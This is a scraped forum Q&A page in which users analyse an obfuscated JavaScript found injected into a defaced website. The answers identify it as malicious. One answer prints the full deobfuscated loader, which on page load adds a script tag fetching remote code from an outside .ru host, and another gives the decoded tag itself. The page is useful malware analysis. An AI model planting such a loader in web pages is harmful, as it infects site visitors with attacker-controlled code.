ansaurus

Question

What does this script do? Is it malicious?

Answer 1

+7 A:

If you didn't add it, well, than it certainly classifies as malicious.

The MYYN 2010-05-25 10:49:10

Answer 2

A:

If you want your question answered, i guess u need to format your code to look better. In a more human readable form.

Something like this http://stackoverflow.com/questions/2903500/how-to-scroll-the-horizontal-scrollbar-in-an-iframe-from-the-parent-frame

Edit

Also it looks like your "Malicious" script broke the SO site. it is certainly Malicious

dkris 2010-05-25 10:49:22

Answer 3

A:

Well, by definition it is malicious, as it was added as part of a defacement. It appears to redirect people to tenthprofit.ru, but I haven't run it so that's based on a cursory inspection of the (obfuscated) code.

Graham Lee 2010-05-25 10:53:10

Answer 4

+6 A:

Yes this is certainly malicious. It tries to look like a part of google:

new String("/goo" + "gle." + L("com/DyBg", 0, 4)

But it acctually does something (redirect / information gathering) on tenthprofit.ru

new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

Best is to save this code and delete it from the page.

Also to make it more readable you can run it trough: Jsbeautifier

RJD22 2010-05-25 10:56:44

Here's another one that has some syntax highlighting as well: http://www.gosu.pl/decoder/

Don 2010-05-25 11:10:06

Answer 5

+3 A:

This script adds a new <script> element to the body of the HTML file which tries to load "tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php" as the src element of the tag. It's been taken down, so it should be harmless by now.

To the end of the BODY tag following line is added:

<script src="http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"&gt;&lt;/script&gt;

Andris 2010-05-25 10:57:42

Answer 6

+1 A:

Here is the "beautified script":

var GU = '';
var h;
var X = new String();
var mP = "";
H = function () {
    var F = ["hu"];

    function L(Lc, O, d) {
        return Lc.substr(O, d);
    }
    OH = 55345;
    OH -= 37;
    var x = document;
    QM = 6929;
    QM++;
    q = 25298;
    q -= 65;
    var t = '';
    var vs = {};
    var u = ["hR"];
    var Oi = RegExp;
    var A = {
        kh: "LQ"
    };
    var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
    yz = {
        Ec: false
    };

    function y(Lc, O) {
        hI = 24414;
        hI++;
        g = {};
        a = 28529;
        a--;
        var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
        var m = new Oi(d, String("g"));
        n = {
            kW: 40818
        };
        ly = {
            HN: false
        };
        return Lc.replace(m, t);
    };
    ZW = 9686;
    ZW -= 202;
    GE = 56525;
    GE -= 235;
    D = ["u_", "QP"];
    var E = null;
    var vd = {
        ka: "J"
    };
    var Jn = new Date();
    Xg = {
        V: 51919
    };
    var l = 751407 - 743327;
    try {} catch (U) {};
    var W = new String("body");
    var qi = "qi";
    this.Vf = 38797;
    this.Vf--;
    var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
    var RlE = 58536;
    var Xx = false;
    this.jo = '';
    vi = 41593;
    vi--;
    h = function () {
        try {
            var YU = new String();
            var DY = "";
            var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
            CN = {
                _Y: 63379
            };
            s = x[dY](P);
            var fH = "fH";
            pI = 33929;
            pI--;
            Uw = [];
            var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
            var Wg = [];
            var Lc = l + v;
            var yW = new String();
            var iO = new String();
            var Oe = String("defe" + "r");
            var Et = ["qO", "AF"];
            var QX = 13548;
            s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
            PA = {};
            s[Oe] = [2, 1][1];
            this.Vt = "Vt";
            var ho = 46131;
            try {
                var kn = 'cI'
            } catch (kn) {};
            this.ww = 27193;
            this.ww += 97;
            x[W].appendChild(s);
            this.yk = 60072;
            this.yk++;
            var Lp = new Date();
        } catch (PY) {
            this.ku = 43483;
            this.ku++;
            this.ra = 47033;
            this.ra--;
            this.ru = "ru";
        };
        var lu = new Array();
        var me = new String();
    };
};
YB = ["LB", "uM"];
var AI = {
    Vm: 4707
};
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
window.onload = h;
var PQ = false;
var mF = {
    Hm: false
};
try {
    var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";

I think that this line in particular is a bit creepy:

s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

It sets s[G] to a URL on tenthprofit.ru.

Propeng 2010-05-25 10:59:48

ansaurus

tags:

views:

answers:

What does this script do? Is it malicious?

related questions